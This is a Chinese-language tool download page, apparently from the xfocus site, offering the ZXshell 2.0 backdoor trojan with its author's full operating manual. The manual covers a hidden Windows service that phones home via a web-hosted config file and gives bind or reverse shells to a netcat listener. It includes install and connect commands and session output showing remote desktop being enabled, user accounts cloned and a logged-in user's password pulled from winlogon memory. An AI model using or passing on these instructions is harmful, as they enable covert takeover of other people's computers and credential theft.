xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加工具English Version

ZXshell2.0.rar


提交时间:2004-08-16
提交用户:fatb
工具分类:后门程序
运行平台:Windows
工具大小:199245 Bytes
文件MD5 :64d9f58da4ffd6c7425a8fe692d3bcce
工具来源:www.idontknow.com

① 简介

这木马其中一部分是根据Bingle的关于svchost的原理写的,所以跟小榕的bits有相似的地方,加入了类似winshell及更多的的功能,和服务端上线通知的功能。

zxrecv.exe    是用来接收服务端发来的信息,也就是列出在线服务端的信息。
zxshell.exe    是用来配制服务端zxshell.dll。
zxsvc.ini    放在网络上通知服务端的文件。
nc.exe          用于连接服务端的



② 工作原理

   定时读取用户指定在网络上的一个文件,用户通过配置主页空间上的文件通知服务端作出相应响应。
关于服务端的上线通知的实现我引用网络神偷说明书中的一段话:
============================================================================
本软件(网络神偷)用的是另一种更先进的方法:UDP通知,客户端上网后,会将
自己的IP地址写到主页空间的指定文件里,服务端定期读取这个文件的内容,就可得到
客户端的IP地址,并将自己的一些其它信息(主机名、IP地址、上线时间等等)用UDP协
议发送给客户端。
============================================================================

我只是初步模仿了原理,操作方面还得自己动手修改zxsvc.ini,亲自上传,相对麻烦,但是这样对于一些只支持web上传的免费空间则没有限制。


③ 功能简介

A   进程管理器中看不到

B   平时没有端口,只是在系统中充当卧底的角色

C   提供正向连接和反向连接两种功能

D   服务端具有上线通知功能

E   仅适用于Windows2000/XP/2003

命令列表             注释
?                   显示此消息
info                系统版本信息
shell               获得系统命令提示符
download            Http下载
list                列出所有进程
kill                结束指定进程
termsvc             设置终端服务
fpass               查看已登陆用户的密码
clone               克隆/删除任意用户
whoami              显示本服务的进程PID
remove              禁用本服务
exit                退出但不关闭服务端
quit                退出并关闭服务端
reboot              重新启动计算机
shutdown            关闭计算机



④ 使用方法

注意:首先必须有一个WEB空间用于上传 zxsvc.ini.

1、配置器的使用:

先从下拉菜单中任意选择一个将被代替的系统服务,然后填写一个可以从你的WEB空间下载zxsvc.ini的网址。

例如:http://www.xxx.com/zxsvc.ini

你也可以将zxsvc.ini改为其他名字,如 ip.txt,那么你填写的网址就是 http://www.xxx.com/ip.txt

确认无误后按生成按钮就可以得到配置好的zxshell.dll了。


2、安装卸装

   安装   rundll32 zxshell.dll,I      (逗号后的I注意区分大小写)
   卸装   在telnet连上服务端后用remove命令

3、设置zxsvc.ini

用户在其他计算机安装了配置好的服务端后,必须将zxsvc.ini设置好后上传到配制服务端时设定的网址,下面介绍如何设置zxsvc.ini,该文件原始内容如下:
用户只能修“=”后面的内容!

[zxconfig]

MyIP=127.0.0.1        告诉服务端将UDP消息发给这个IP地址,也就是填你自己的IP
Port=2004        告诉服务端打开这个端口等待连接
Password=123456        客户端连接时需要的密码
Banner=Password:    密码提示

BackConnect=0        “0”表示不采用反向连接,也就是打开端口等待连接,“1”表示通知服务端反向连接。    
ServerID=123        当BackConnect=1时,这里填的数据就是要通知的服务端的ServerID号,该号在接收到的UDP消息中有提供
LocalPort=8080        当BackConnect=1时,必须配合nc.exe使用,在本地打开端口如:nc -l -p 8080,若想再次接收反弹shell必须使用另一个LocalPort!

设置好后先运行zxrecv.exe(接受服务端的信息),然后将zxsvc.ini上传到你的主页空间,位置必须对应在配制服务端时设定的网址,当服务端读取到该文本后先给MyIP发个信息(主机名、IP地址、ServerID号),再判断BackConnect的值,=0则打开Port等待连接,=1则判断ServerID是否与自己一样,如果是则向MyIP反弹Shell!


4、连接服务端

当zxrecv.exe收到信息时会有嘟嘟的响声,信息格式为:计算机名 @ IP地址 [ServerID]
例如:    BillGates@211.21.x.x[2430]

根据你对zxsvc.ini设置,
如果BackConnect=0时也就是告诉服务端打开Port=2004的这个端口等待连接,

你可以选择windows系统自带的telnet进行连接登陆,方法如下:

打开附件中的命令提示符,然后输入: telnet 211.21.x.x 2004
或者使用著名的nc.exe,格式为:  nc 211.21.x.x 2004
如果成功就会收到密码提示Password:
这时输入你在Password=设置的密码后按回车就可以登陆了,(注意选择windows系统自带的telnet时请使用主键盘的回车!)

登陆成功后会收到服务端的命令列表。

如果BackConnect=1时也就是告诉服务端反向连接,这时你需要配合nc.exe在本机监听端口,

比如:nc -l -p 888
那么你就打开了888端口等待服务端的连接,

这个时候就是要通知指定的服务端执行反连接了,你需要修改zxsvc.ini!
比如你的zxrecv.exe显示:
HostName @ IP [ServerID]

BillGates@211.21.x.x[2430]

那么zxsvc.ini需要改的键值:
MyIP=这里当然还是你的IP

BackConnect=1
ServerID=2430
LocalPort=888

重新将zxsvc.ini上传到服务器上!当服务端读取到新的数据后就会主动向你的888端口连接了!
得到的shell功能和正向连接一致!


C:\>nc -l -p 888

命令列表            注释

?                   显示此消息
info                系统版本信息
shell               获得系统命令提示符
download            Http下载
list                列出所有进程
kill                结束指定进程
termsvc             设置终端服务
fpass               查看已登陆用户的密码
clone               克隆/删除任意用户
whoami              显示本服务的进程PID
remove              禁用本服务
exit                退出但不关闭服务端
quit                退出并关闭服务端
reboot              重新启动计算机
shutdown            关闭计算机

CMD>到此你想执行什么操作就键入对应的命令回车即可!
CMD>info
系统版本:Windows XP Professional
语言:Simplified Chinese
驱动程序版本:07/01/2001,5.1.2600.0

命令成功完成。

CMD>shell

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

E:\hack>exit

CMD>termsvc      /////此命令可以开启2000\xp\2003的终端,如果是2000的则需要重新启动计算机。
当前的终端服务端口设置为: 3389
要重新设置端口吗? (y/n): n

当前计算机设置为[不允许]远程终端桌面连接.
要改变设置为[允许]吗? (y/n): y


命令成功完成。

CMD>fpass

        查找登陆用户和密码[For WinNT\2000] 有些xp系统也会成功,可能跟设置为自动登陆有关系。

Process         PID
winlogon.exe    392

Domain And User:
LZX-SERVER\zx

增加调试特权成功.
开始在进程PID: 392 中查找 LZX-SERVER\zx 的密码...
在 0x00e40800 找到一个长为 6 字节的编码口令.
获得计算机登陆的信息: 登陆域: LZX-SERVER 用户名: zx 密码: 520520.

CMD>exit


OK,到此就算可以结束了!希望使用者多提宝贵的意见!谢谢你的使用!

                联系方式:Email: cnlzx@tom.com
                             QQ: 5088090


                              ---- LZX
                        2004.07.29

>> 下载 <<